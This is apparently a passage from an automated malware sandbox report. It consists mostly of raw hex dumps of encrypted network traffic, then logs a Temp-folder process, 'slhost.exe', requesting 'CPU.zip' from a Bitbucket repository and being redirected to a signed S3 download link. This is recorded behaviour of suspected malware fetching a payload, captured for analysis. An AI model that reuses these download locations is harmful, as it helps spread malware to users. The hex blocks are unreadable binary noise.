                                                                                                                                                                                2021-11-11 11:27:09 UTC13237INData Raw: 12 7f 8e 59 00 cd d8 76 de 11 4c 00 50 2a 8d a5 6d f7 9a e1 01 22 89 27 75 44 ec 2c d8 e9 7f bf 73 00 01 29 cd f6 5d 58 2a be 77 cd 55 ba 12 10 17 bf aa dd f1 6a 3c 91 22 04 28 fb 7d 44 31 57 b8 fd 4b a6 7c 90 0b 8a 35 20 25 5f a0 47 68 1b 74 7f 5f 36 e9 72 cd 55 af 47 5f 91 7f 69 31 62 45 2c 5b 33 20 0c 9d 65 93 13 5a a6 18 05 2a f4 ef 7b ef 28 f1 f6 10 74 3f 37 58 48 0f be dd a2 7e 80 81 c6 84 8a c7 7f b0 d4 ee 76 2c 7e 5f d0 0f ec 38 72 ae b4 88 7a 2c 93 ff 89 09 f7 dc df 71 e8 82 9f 20 ed 5a 00 f4 51 72 86 0f 04 44 29 e6 40 5c 01 f0 5e e9 58 9e 75 84 f2 0e 1e 94 e3 93 81 e1 e4 bc 71 7e e7 6e 04 78 7a 3f 5f 34 af dd 39 2b da c5 40 1e 68 0a 22 20 e7 75 c2 4b 00 61 30 64 ed 5e 86 14 58 53 bb 0c 27 01 75 c5 84 38 5f bc 76 e0 68 64 c6 e8 4b 67 4c 13 50 a0
                                                                                                                                                                                Data Ascii: YvLP*m"'uD,s)]X*wUj<"(}D1WK|5 %_Ght_6rUG_i1bE,[3 eZ*{(t?7XH~v,~_8rz,q ZQrD)@\^Xuq~nxz?_49+@h" uKa0d^XS'u8_vhdKgLP
                                                                                                                                                                                2021-11-11 11:27:09 UTC13253INData Raw: ec af 30 24 e4 0a 61 f0 b1 00 19 74 6e 64 d6 33 3e 94 b7 d0 ac 72 0e 00 5f 84 4b f6 b9 1a 60 d1 00 d5 ac 3c 29 21 70 47 f4 00 20 fe bf 0a 28 7f 6e 38 00 bb 6d 6a 90 e5 d0 49 d5 25 e9 3a 6c f5 16 d8 c7 fd ee 20 ec 68 b8 a3 9f a7 ac 14 99 d5 cd 30 99 33 25 31 a0 08 08 28 5c 2d 2d b7 c4 67 12 68 67 25 ea 01 e7 e4 42 77 22 2e ae 62 58 94 5e 1e 49 f0 6f 0b 97 78 6c 3f 55 cc 4d 00 50 b8 c3 42 f6 3b ff c0 26 c1 e0 d5 01 a9 b3 f7 7f 31 6a ac c8 4b bb 8e 20 84 e9 bf ab e8 50 c3 4f 16 7f 8c b9 b2 d2 f5 8f 05 10 eb 12 3e af b6 78 03 68 97 de be 71 28 30 55 a7 62 dd 8c ec 5d 55 fc 80 69 72 97 e6 84 2d fb 3e 57 ba 3c 03 0d e9 ad 75 a7 1d 22 df fd c4 7b d3 a4 80 28 6f 09 96 78 45 00 b5 c6 a5 21 03 50 8e 8b 90 89 00 48 28 4e 0c 71 34 e0 70 03 39 42 8c ba a2 3f cf c0 74
                                                                                                                                                                                Data Ascii: 0$atnd3>r_K`<)!pG (n8mjI%:l h03%1(\--ghg%Bw".bX^Ioxl?UMPB;&1jK PO>xhq(0Ub]Uir->W<u"{(oxE!PH(Nq4p9B?t
                                                                                                                                                                                2021-11-11 11:27:09 UTC13269INData Raw: fa 84 00 15 10 5e 6a 56 a7 57 b3 3c ba 32 00 77 4a 87 27 75 88 f2 00 21 52 5d ce c6 81 5b 29 04 6d 37 bc a7 c8 80 41 8d 22 77 f8 3b 00 eb ad 9e 26 27 02 91 16 01 d2 62 a1 50 19 36 64 40 ee df b7 da 0e 10 06 a4 98 20 25 c5 42 62 80 01 a5 73 1e 86 35 11 a9 d8 66 f4 00 64 8b 04 30 27 b6 aa ef 00 94 c9 f0 d0 4d 03 18 c8 00 45 a8 95 af 6c 17 fa 96 00 e8 26 4a 46 6e 74 89 d8 00 65 5a 56 40 bd f8 ac 24 00 fe c3 ca d2 2f b9 54 d4 00 af 88 ed 80 58 cc 41 a0 07 e2 92 cb c5 dc 40 8c a1 c2 c3 00 66 b1 34 6f 89 9f 2d 04 01 28 7f 0a 8a 6d 84 6a c8 23 64 0c 24 4f 86 aa 16 f8 f0 d0 01 d6 2a b0 69 73 6c 9d d7 a0 49 e5 82 00 96 1a c9 d1 25 da 02 f9 00 81 76 04 cc f6 37 e6 94 00 95 f8 0b 18 6f af f2 b3 3b c4 3b 80 03 c2 ae 8d 30 a8 cd c0 1e 2e a6 0f 7e 77 07 e6 d5 2d 53 f5
                                                                                                                                                                                Data Ascii: ^jVW<2wJ'u!R][)m7A"w;&'bP6d@ %Bbs5fd0'MEl&JFnteZV@$/TXA@f4o-(mj#d$O*islI%v7o;;0.~w-S
                                                                                                                                                                                2021-11-11 11:27:09 UTC13285INData Raw: e9 00 0b 3d ca 98 39 b1 41 52 00 50 f3 32 9f df 80 70 b7 00 7c af e7 18 0a ab ec d3 00 a2 67 b1 5d 74 39 57 fb 07 d8 64 70 5c d2 30 5b 29 8a c1 00 c2 bf 10 9c b6 b4 1b 14 00 75 59 81 98 da 7c 26 d5 fb fc 50 05 00 0a 3f 62 3a b7 68 c9 95 3c ce 93 58 2f 00 01 24 34 5d 21 92 03 c7 76 64 f7 67 95 90 7a d8 d9 42 00 bb 41 6d a6 1e af 3f c3 1e 3a 1d 25 80 c1 e8 cf ed 9f fe 00 e1 78 7a 49 46 fb 3f 21 00 10 ba 32 aa 67 e5 e3 6f 00 5f c2 a2 8a a5 ef 5c 2d 00 a4 c1 b0 32 0a 71 4e e5 1c 59 e7 8d 03 5b bd 58 9b d8 54 76 e2 17 a8 c1 3c 00 96 dd 4a 72 41 ea 2c 3a af 7f 00 05 34 58 e0 b4 03 00 e2 17 d1 ee a5 57 55 2c 00 4c a0 7e f4 df 5d 44 ed 58 59 0d 7e 00 04 74 d7 32 9c 9e fe c4 00 15 03 e1 a0 1f ca 92 7b 73 e2 05 69 db 74 a1 d4 c3 be 39 b8 c9 29 68 01 3f 13 64 d2 0c
                                                                                                                                                                                Data Ascii: =9ARP2p|g]t9Wdp\0[)uY|&P?b:h<X/$4]!vdgzBAm?:%xzIF?!2go_\-2qNY[XTv<JrA,:4XWU,L~]DXY~t2{sit9)h?d
                                                                                                                                                                                2021-11-11 11:27:09 UTC13301INData Raw: f1 97 93 37 21 c0 8d 86 35 c7 00 04 1a 22 b5 7d 80 ed fd 00 e0 fb 76 f7 5b 45 6c 42 1e 14 19 f6 c0 5a df aa cc 98 99 00 6a 40 1a b5 48 fb ac 69 00 c7 b4 c0 63 e0 90 7c a9 00 24 23 f0 58 4b f5 91 60 00 5d a6 b6 92 fd 89 48 bd 00 3d 39 44 a8 7e e5 e3 25 00 ec 0b 6f cc 43 c7 de 88 00 6e dc 40 9a f5 af 8e 86 00 2a 4d ef d6 19 77 7e 1c 00 21 59 20 bb 5b 22 fb f4 77 41 fc c6 07 9c c0 85 89 26 40 0c 9d e5 16 2e b7 0f 0c 00 33 47 52 17 cb c8 b8 76 00 e8 f9 0d fa 34 66 7a 0b 2c fc 2f 1a 1d 4b c7 d2 ce 2c a1 9d 0c 8b f8 29 a5 00 43 73 e7 d1 34 be 2e ca 0b 0a 46 b7 3c dd 01 49 f6 d6 bf 30 a1 1c 71 b2 00 25 e5 06 d3 33 98 7a 31 73 da 07 d1 09 54 e8 1e e0 7f 9c 88 d2 0e 75 9a db bd 43 7a e2 c9 88 85 5b 04 00 7b cf 59 0c 5e 2c e8 65 1f f7 2f 44 c0 05 83 d9 74 39 e1 01
                                                                                                                                                                                Data Ascii: 7!5"}v[ElBZj@Hic|$#XK`]H=9D~%oCn@*Mw~!Y ["wA&@.3GRv4fz,/K,)Cs4.F<I0q%3z1sTuCz[{Y^,e/Dt9
                                                                                                                                                                                2021-11-11 11:27:09 UTC13317INData Raw: fe 61 13 d8 cd f6 93 00 8a b7 64 f9 ee 92 2a 56 00 c9 3d 5e 9c 9a bc 54 0d 00 30 8e fc 88 15 f8 32 d4 00 fe e0 55 92 f2 13 69 42 00 3e a0 2a 58 b7 8c 78 01 00 21 fb a6 4e d3 52 e9 e6 38 6a 72 80 2a 29 89 a2 e8 d2 dc 00 a4 36 21 28 c4 d1 67 3a 00 56 06 9c 16 f6 52 5c 68 01 59 fe 84 10 2a c8 57 80 ce be a1 1d 69 60 0c 07 09 3f bb bc 97 30 ee 0f 0d cd 72 b7 05 66 cc 6e e7 c9 c0 fa 44 5c 16 07 e9 48 fa 81 c4 eb 07 65 a6 00 84 ae 79 04 03 ed 10 78 f7 22 17 88 92 7e 5d fa 2a 01 b2 7a 67 0d 19 33 0b 80 98 44 4a ec 46 ab 6b 00 6a 18 22 50 e8 24 ac 99 00 f8 0f 86 1b de cf 2e 0a 00 d5 98 62 93 28 f5 bb e4 14 c7 ae dd 92 00 4a 44 aa c8 52 df 2c 00 b5 9c d5 51 fd 70 c4 86 07 c2 31 09 ad fb 20 5b 61 52 e5 00 3c 13 c3 10 be 03 30 2b 00 90 ab 3e 4b bb 16 ee 5d 00 7b e7
                                                                                                                                                                                Data Ascii: ad*V=^T02UiB>*Xx!NR8jr*)6!(g:VR\hY*Wi`?0rfnD\Heyx"~]*zg3DJFkj"P$.b(JDR,Qp1 [aR<0+>K]{
                                                                                                                                                                                2021-11-11 11:27:09 UTC13333INData Raw: 26 82 4f 9b a1 00 bc a3 18 5b ef 97 43 c9 00 c4 02 0f ac 4d 65 32 e6 33 83 5e f6 03 db 89 88 91 de a2 00 40 fd 39 a1 4f 9f 12 0d 00 eb 5b 2d 75 d4 f8 a3 72 90 37 00 9b 0a 4d 28 80 f1 20 aa 00 d1 52 22 db 92 27 26 42 01 39 9b 95 2c 0c 2f 2a f4 7d ae 00 ea f1 47 be 3f b9 f7 ce 02 72 17 b7 20 12 ba d7 60 e9 e9 4e 00 02 6d 41 28 fd 2c ee 14 00 8d b1 b8 8a 19 b0 43 a7 ec f5 00 c2 72 44 b2 e4 e5 a4 37 00 34 03 48 93 7f bc 1c d3 00 6f 76 01 13 b0 28 bb c2 00 14 1b 37 aa a5 54 7b d3 e2 3a 00 c1 53 9a 04 8c 5f 98 17 39 4b c8 83 1d e0 a3 99 bf 88 94 15 8a 26 5d 82 6d 0f 0c 26 00 aa 31 72 a1 c9 00 ba 0f bf 90 a7 4c b2 7b 00 e2 a0 d8 c7 8b ac 5d 54 1e eb e7 e9 c2 2e a9 6e 1e 60 ac 25 0f f6 22 7e 47 03 37 70 17 d7 f0 9d d0 3d 66 79 01 2f 7e b0 8d d8 cc b5 d4 4c 77 00
                                                                                                                                                                                Data Ascii: &O[CMe23^@9O[-ur7M( R"'&B9,/*}G?r `NmA(,CrD74Hov(7T{:S_9K&]m&1rL{]T.n`%"~G7p=fy/~Lw
                                                                                                                                                                                2021-11-11 11:27:09 UTC13349INData Raw: 11 13 89 cd ad 97 cf 17 07 b1 9b 65 82 62 57 bc e9 00 9a 14 1c f0 bd 00 39 ec 74 9d a5 d9 36 8c e4 11 00 28 75 2f 1e d8 f2 78 a0 00 40 b0 cc 4f e8 5d 38 64 90 25 00 ea 89 81 2e 1a a5 72 6b 0e b3 66 5f a9 e0 50 4e 9b 69 7c 00 f5 d3 ac db bf 9e be 99 c1 18 0a 48 3f de fc 4c 12 00 46 a9 b6 5d 8d 59 29 77 17 b3 aa 1d 00 d7 15 81 71 de 84 00 e3 20 1f e5 d4 b1 c4 3c 00 b6 0f 2b f8 1c 59 a0 f5 07 26 e2 10 fd 0e 10 1a 45 15 6f 7d 4c ec b1 00 a4 a5 e4 9c 88 6d e9 22 01 12 30 7c aa f0 b7 ce e0 5a 1e 03 46 e5 e4 4f 27 3d 81 24 30 fc db dc 3d 2e cb 00 03 bd 80 74 42 f1 c8 00 65 36 d3 b6 2d 87 23 2b 00 63 79 a3 d1 ee ab 51 9f 00 49 53 15 59 41 ca b5 81 00 77 fc 3d b7 f6 18 f7 0c 1d 94 83 3c 00 a9 f5 b1 66 23 8a 00 cd 7f 72 0f 67 d9 f3 ac 03 44 c9 8d 13 5a d2 89 f4 6b
                                                                                                                                                                                Data Ascii: ebW9t6(u/x@O]8d%.rkf_PNi|H?LF]Y)wq <+Y&Eo}Lm"0|ZFO'=$0=.tBe6-#+cyQISYAw=<f#rgDZk
                                                                                                                                                                                2021-11-11 11:27:09 UTC13365INData Raw: 09 a7 9d f9 ad a1 e4 ce 00 7f 02 53 cb e8 f3 ae 12 00 d2 44 73 14 34 ee b6 ce e8 b3 00 45 7a d1 3e 26 60 d4 e8 00 a8 e9 69 d7 97 84 66 98 00 18 31 0d f8 d8 45 cf 68 00 7f a2 23 4e 0e 79 e1 0c 00 7b 35 bc 24 2e 94 66 38 1d c7 7e 33 c1 fc ee b5 b0 07 e8 1a d5 03 20 d3 3e 4b c6 9f e8 76 d2 dd 00 54 f8 34 41 17 5c f0 b9 3d 22 24 82 f1 37 bb 60 23 60 8f 36 42 00 12 1e 17 2d 3b db 84 a3 00 c9 90 d2 e9 f9 7f a6 b3 00 1f 2e e3 e1 38 3f 21 7a 00 60 e6 93 01 f2 49 cb ab 00 15 5f b3 0c 25 29 07 6b 0b f4 06 b8 e0 78 0b 00 75 3e 7e ab 1e 3f e6 53 0e 5e 64 6f 28 2e 9a a0 33 77 10 f9 85 00 36 70 ab 32 05 e0 3d 13 00 91 3c cd d7 4f 8e f6 b4 00 41 07 b6 df 64 c2 50 de 00 68 aa f5 a7 e2 a9 81 a5 00 45 4a 39 e1 37 64 ac ef e8 f0 00 a6 59 89 09 2a 97 d8 b4 00 f9 26 9d 68 b3
                                                                                                                                                                                Data Ascii: SDs4Ez>&`if1Eh#Ny{5$.f8~3 >KvT4A\="$7`#`6B-;.8?!z`I_%)kxu>~?S^do(.3w6p2=<OAdPhEJ97dY*&h
                                                                                                                                                                                2021-11-11 11:27:09 UTC13381INData Raw: 54 cc 11 7d f9 48 3c 80 cf 11 aa 97 76 98 11 53 d6 0c 22 d8 20 58 95 20 50 82 80 08 48 96 93 38 20 08 24 1a 98 18 b3 31 1c 1f 11 81 99 2d 11 a8 84 8b 11 c9 9a ac 8c 31 cc c4 11 e2 9b e3 e0 31 e4 11 1b 9f 35 bc 98 31 34 11 2a a0 d9 91 19 2c 99 11 dd 09 9c 88 19 14 a1 1d b9 2c 00 c6 bc 11 2a 0c a2 cc 41 82 03 08 b4 32 09 ec 19 dc 22 9b a3 4c d4 62 c4 11 02 a5 eb bc 33 31 04 11 be e4 98 e0 c0 c4 11 35 a6 9d 14 8c 11 61 a8 61 83 81 6c 9f 11 95 29 18 18 98 11 42 a9 ab c0 37 31 44 11 bf 93 99 5c 8a 11 59 aa e8 b3 31 5c 12 11 1d ad 63 a4 20 33 11 bc 09 54 44 30 08 35 66 af 08 88 19 6e 38 11 0c b1 08 68 d1 18 08 1b 8d b2 91 31 19 90 11 a5 b5 75 30 98 19 a8 11 3e b6 ba 78 cd 19 40 11 d1 b8 8f 08 28 84 95 08 13 73 b9 59 28 19 74 9f 11 92 24 74 c6 94 11 36 ef bc 51
                                                                                                                                                                                Data Ascii: T}H<vS" X PH8 $1-11514*,,*A2"Lb315aal)B71D\Y1\c 3TD05fn8h1u0>x@(sY(t$t6Q
                                                                                                                                                                                2021-11-11 11:27:09 UTC13397INData Raw: 70 cc 1b 02 da 79 ec 19 ac 2c e0 37 c7 56 00 98 97 9b d5 c8 e4 2a 83 79 c3 00 86 6b 90 91 f4 93 47 f8 00 d1 02 9b 99 20 a0 b4 8b 7a 78 00 7a 0b a6 18 3a ec f3 2a 00 d6 1d 29 74 06 f2 2e e3 00 33 27 c9 e8 62 0c 9e 3a 0a bf 75 0a 10 b3 1c b0 40 99 07 ee c7 3e 31 00 71 d2 bf 23 11 70 95 e1 00 0a 37 2e da 93 9d e6 a9 04 67 c5 fc 72 38 c0 73 97 2a 06 00 02 89 86 c2 5d 78 ed 8f 00 0c 67 79 65 75 eb 12 d5 01 5b f4 b2 21 6e f3 13 20 87 ee 7b 99 00 9a 2b 86 95 79 c9 17 8a 00 20 39 8c 97 2e 2c 5e 5d 16 e3 d5 15 0b 48 dd 00 87 b9 db 51 9b 0f 72 ef c5 54 8e 18 c0 8f 34 b2 3e 63 00 29 b6 91 82 6f c0 1a 20 77 f3 00 80 f0 61 44 db 7a a6 02 39 52 a1 9d 15 74 85 4e 9c a9 c0 62 95 c4 c6 fe d4 70 6a 00 14 3f e6 d1 50 83 79 a8 00 b8 74 bf 26 76 c1 4e c5 07 8f 49 a3 1b 56 21
                                                                                                                                                                                Data Ascii: py,7V*ykG zxz:*)t.3'b:u@>1q#p7.gr8s*]xgyeu[!n {+y 9.,^]HQrT4>c)o waDz9RtNbpj?Pyt&vNIV!
                                                                                                                                                                                2021-11-11 11:27:09 UTC13413INData Raw: b0 5e 18 a9 1e 5b 00 dd 86 f7 a4 df 02 b6 a5 01 9a ed fa 4e 96 1d a1 e9 c8 ec e3 6d 00 15 3f 92 bb 59 63 c5 c1 17 1f 69 bc 07 0f db fe 93 40 6b e8 31 dc 34 00 7e eb 4d ed df f1 39 74 00 e7 42 59 1c 24 2d 84 36 ee ac 3b e2 fe 80 0e af aa b2 39 dc d0 39 91 2a 0e 31 15 55 a0 68 4b 51 fe 86 00 1b 32 ec 4d a4 a3 f6 80 00 58 97 28 e6 0c 70 d6 da 00 6b 79 57 c4 94 fe 93 0e 0e 55 17 75 dd 20 49 26 85 df 76 fa 4c 00 1a 0c a2 de b1 22 8f 60 00 38 b4 aa 12 bf 37 f3 18 00 c4 ac f1 46 b6 9d b0 e3 00 f2 4a d1 f9 3b 85 74 67 74 eb 00 1e 9b 7d ab 07 be 06 e5 00 e9 0d a5 54 e4 03 05 c8 00 5e 92 98 e8 55 b0 3b 33 7a 0a 00 1a d7 7b 1b 9e 3f 53 7c 00 ac 7f e5 c3 3b 51 6e a8 1d 6f 67 97 c0 04 bc 96 b3 7a d4 00 b4 da a7 c4 98 8e ea 65 39 5f 0b 03 9d 14 a2 59 d2 90 3b 56 f9 3e
                                                                                                                                                                                Data Ascii: ^[Nm?Yci@k14~M9tBY$-6;99*1UhKQ2MX(pkyWUu I&vL"`87FJ;tgt}T^U;3z{?S|;Qnogze9_Y;V>
                                                                                                                                                                                2021-11-11 11:27:09 UTC13429INData Raw: 1f b0 1c aa b9 00 2a a8 9d 4c 88 d4 f7 8f 05 4f f1 71 87 2b 90 2b c8 41 1b 00 08 28 d3 03 3b ca cb 17 0e c4 f9 8e 2c 03 5a f6 fe 80 d6 62 79 00 b0 e2 63 14 7c 9b 69 f7 01 c8 88 aa 07 a2 38 f9 21 f6 e4 ef bc 00 df d4 d2 05 af 9c b4 b6 00 31 cf 54 f9 64 cc fe 45 00 44 98 f7 a9 9e 4d d0 df 00 49 ba bb 21 3f 11 89 d2 00 37 1a dc 5c 35 25 50 4b e4 c5 76 66 0f 08 52 3d 44 e0 b7 2b e9 89 b5 18 6d 99 2f da 24 b6 01 8a b2 a2 5a 8e d2 9f d8 86 22 00 34 38 ab fa 3f 15 37 20 01 f5 74 9d 57 81 4f c7 c1 84 d0 a5 fe 01 d8 43 3e df f4 eb 02 cc 2c 6e 00 6b ae 99 b9 21 82 c1 08 00 2a 6f 28 45 56 87 e8 dd 1e d9 10 09 5e 0e 00 c5 2f 47 91 4b 89 04 b3 14 25 97 ed 80 e0 be f3 4a 00 c0 33 f9 65 58 9b b9 68 00 ae 2c 29 d1 45 e6 7d 88 0a 50 36 60 2a 9e 00 3b ef 8f 09 ea 01 07 f7
                                                                                                                                                                                Data Ascii: *LOq++A(;,Zbyc|i8!1TdEDMI!?7\5%PKvfR=D+m/$Z"48?7 tWOC>,nk!*o(EV^/GK%J3eXh,)E}P6`*;
                                                                                                                                                                                2021-11-11 11:27:09 UTC13445INData Raw: ed b1 eb 00 cf 20 4d 82 ce 10 3f 14 00 f7 78 60 7b 4a 9b 7d 1c 3b b2 88 00 fe 89 3b 9a f4 0a d2 03 d9 b6 cd 6d 12 9e 88 b4 6e 3e 1d b7 e1 78 af 00 78 7b 2c 2d 3a 0c 86 fb 51 9b 54 27 7d e7 1f 44 75 70 00 38 21 37 6a b0 c7 00 a1 36 c3 b3 7d b9 e2 1d 0b 69 e5 a6 3b 80 88 ad f7 89 2c 3e 91 61 80 71 6e db f6 5e 33 9d 00 32 fb ef 40 b9 a4 de 5c 00 83 04 58 d9 0b da 79 95 00 b1 33 cc d0 38 99 98 64 17 91 73 0d 04 f8 dc 1e fb 80 d8 ae ca ec 00 13 7e 39 58 79 3e 08 d9 03 07 5b dd b4 73 1a 80 5e 0e eb 01 e2 12 e7 16 1d 68 b3 6f a0 38 37 00 b9 ba 0b 57 15 5c c7 31 3f f7 24 00 bf 66 de a3 5e f1 89 00 ab b9 a6 3d 8b c1 70 4a 00 02 24 72 17 27 3b 01 7c 70 33 1d 85 fc f8 80 07 3c dd 86 45 ec 3d 2a ce 83 99 93 19 65 e4 d0 8b 67 69 00 ed 62 6d 17 91 3b 98 dc 90 47 00 e7
                                                                                                                                                                                Data Ascii: M?x`{J};;mn>xx{,-:QT'}Dup8!7j6}i;,>aqn^32@\Xy38ds~9Xy>[s^ho87W\1?$f^=pJ$r';|p3<E=*egibm;G
                                                                                                                                                                                2021-11-11 11:27:09 UTC13449INData Raw: ad 76 7d 7e 30 f3 60 67 f6 01 0d 5c 28 10 2f c7 61 c8 cf fc 00 a2 fa 19 1b 1f 21 9a da 00 2a 3a 1e ed 88 8d c4 7c 00 67 96 68 15 03 5a f1 31 3c 66 81 39 18 80 ee b5 65 7c 5c cd cb 00 a4 40 ab 19 05 bb f7 b6 3e b2 47 80 e1 01 95 f2 5a b8 78 07 a0 dd 86 c8 6c ff c9 17 80 65 93 57 ad 12 00 f2 fa c3 0b 6a df d5 d1 00 e4 38 99 c2 35 48 53 4b 01 22 83 b2 fa eb 70 e7 cc 6f 51 c0 fe 47 b0 01 62 40 0c 4e 1f f4 dc 8e fc f8 50 0e 64 f5 73 b1 3f c0 96 6d 10 d1 2d 0c 01 11 41 17 04 8a 0e ee d0 c4 51 01 cd 3c 66 30 2b 40 47 fc 9b a6 01 d5 c9 aa bb 53 85 1c f0 35 81 f7 fc b9 cb 00 ad cc 0b 70 3d 50 55 15 03 43 f8 aa 9e d6 ca c8 d5 83 41 00 f5 89 2c dc 4f 75 2a 99 1f fb af 42 40 ab 2d 37 25 01 de 00 b6 c4 cb 11 0f 6c 2f 03 00 3a b3 95 a8 c5 89 db bf 01 a5 33 8d 1d 66 8b
                                                                                                                                                                                Data Ascii: v}~0`g\(/a!*:|ghZ1<f9e|\@>GZxleWj85HSK"poQGb@NPds?m-AQ<f0+@GS5p=PUCA,Ou*B@-7%l/:3f
                                                                                                                                                                                2021-11-11 11:27:09 UTC13457INData Raw: a3 45 65 07 a9 40 18 81 c4 21 fb 1f b0 d8 cb 22 07 b7 8e e1 7d 7c 11 f4 88 e3 30 6a 7f 00 68 7a 7e 0e 96 9d 2d c9 1d 45 40 3c 80 ab 4d 24 84 dd b9 07 b5 86 05 02 a0 13 e8 1f f0 9f bb 74 ec 32 3c 64 a2 80 62 0f 61 f7 73 0b 56 09 16 04 a6 58 80 b1 20 ba bb 87 03 72 03 8d c0 8e c3 db 94 b8 19 2c d9 3e c2 0a 00 09 41 dd e1 61 93 6e 01 85 45 e7 04 9a 8f 5f d4 79 2b 00 0d d7 38 db 34 3b 4f 26 00 83 0f 9a 82 90 8a 2e 69 00 b0 d9 4a 56 0a b9 ad 25 01 06 13 eb fb 75 6c 31 e4 a0 5d 7d 4e 3e d2 1c 00 01 83 f6 9b e3 aa f3 0e 05 44 6b c3 20 c4 99 ed c8 4d 3e a9 33 0f 1e 74 75 c0 66 8f b6 01 b5 00 b0 76 d0 0d 39 e0 9c 7f 00 1e 8e bd 31 e5 a5 c3 f9 00 3c 50 06 71 c5 96 f0 e0 7c 20 02 ef f4 29 c1 64 47 60 dd 22 78 f0 cb 00 6a 49 9f e9 61 a6 e3 e4 17 1b df 42 00 9b 80 47
                                                                                                                                                                                Data Ascii: Ee@!"}|0jhz~-E@<M$t2<dbasVX r,>AanE_y+84;O&.iJV%ul1]}N>Dk M>3tufv91<Pq| )dG`"xjIaBG
                                                                                                                                                                                2021-11-11 11:27:09 UTC13473INData Raw: b0 03 c4 f3 b8 6d 4a 0b c0 78 8b df 00 9c 24 ce 55 c2 27 af b6 00 b2 f8 0e 5b 72 4e 82 dc 00 0d 6f ad 53 cd e1 b5 81 01 ab 19 af 1a 84 bb dd dc fe da 00 0f 05 0e fc 2f c5 33 2e 7e f0 73 3d f0 f5 00 90 d7 79 f3 86 df 78 64 3b 5d b5 3c 18 74 1f 09 a4 a3 c0 a5 27 1a a0 75 b9 2e a7 7f 60 1d 94 40 65 f6 3a 99 90 8b 00 86 5a 01 9f a3 9e 35 61 00 53 2c a5 bc 89 58 dd d1 00 86 21 e9 30 3e d5 e8 2a 00 49 79 e3 c7 4d 8b ba 73 1c 05 ef 0d 40 af 4b 25 3d fc 47 1f 55 70 01 c0 db cf 05 90 bd e9 1f ac 1f f4 40 ca 80 1b 97 7d dd 3a b1 59 00 7a 86 b6 47 71 5a af 00 50 e7 95 ca d1 c6 4f f4 00 e1 e3 20 a3 8a 54 e5 7c 09 c1 98 15 ca 00 68 04 8d af 61 01 fd 24 05 69 a1 13 a6 cc 5c 72 03 0e 79 c1 c8 b3 44 e8 cc 50 ba 00 83 64 ed 0c d6 b2 87 a8 03 88 c5 e5 8a a2 2e e0 d9 7a 76
                                                                                                                                                                                Data Ascii: mJx$U'[rNoS/3.~s=yxd;]<t'u.`@e:Z5aS,X!0>*IyMs@K%=GUp@}:YzGqZPO T|ha$i\ryDPd.zv


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                13192.168.2.549855104.192.141.1443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-11-11 11:27:18 UTC13475OUTGET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                Host: bitbucket.org
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2021-11-11 11:27:19 UTC13475INHTTP/1.1 302 Found
                                                                                                                                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                X-Usage-Quota-Remaining: 999278.689
                                                                                                                                                                                Vary: Accept-Language, Origin
                                                                                                                                                                                X-Usage-Request-Cost: 733.73
                                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                X-B3-TraceId: ac02570f439c3665
                                                                                                                                                                                X-Usage-Output-Ops: 0
                                                                                                                                                                                X-Dc-Location: Micros
                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:19 GMT
                                                                                                                                                                                X-Usage-User-Time: 0.021558
                                                                                                                                                                                X-Usage-System-Time: 0.000454
                                                                                                                                                                                Location: https://bbuseruploads.s3.amazonaws.com/e8466680-8c82-495b-9e3c-2c79f82869ce/downloads/7737de24-30d9-4daf-b72b-bce98dc0f6f9/CPU.zip?Signature=3Tzq39O6DbHYG0DRC9lAn6yjoV4%3D&Expires=1636631244&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=rNhERZ1bRKwlh0QCY62w5KsnWg9_i2WQ&response-content-disposition=attachment%3B%20filename%3D%22CPU.zip%22
                                                                                                                                                                                X-Served-By: 18901d591dc3
                                                                                                                                                                                Expires: Thu, 11 Nov 2021 11:27:19 GMT
                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                X-Static-Version: a4fadf181312
                                                                                                                                                                                X-Render-Time: 0.0401170253754
                                                                                                                                                                                Connection: close
                                                                                                                                                                                X-Usage-Input-Ops: 0
                                                                                                                                                                                X-Request-Count: 859
                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                X-Version: a4fadf181312
                                                                                                                                                                                X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                14192.168.2.549857104.192.141.1443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-11-11 11:27:19 UTC13477OUTGET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1
                                                                                                                                                                                Accept: */*
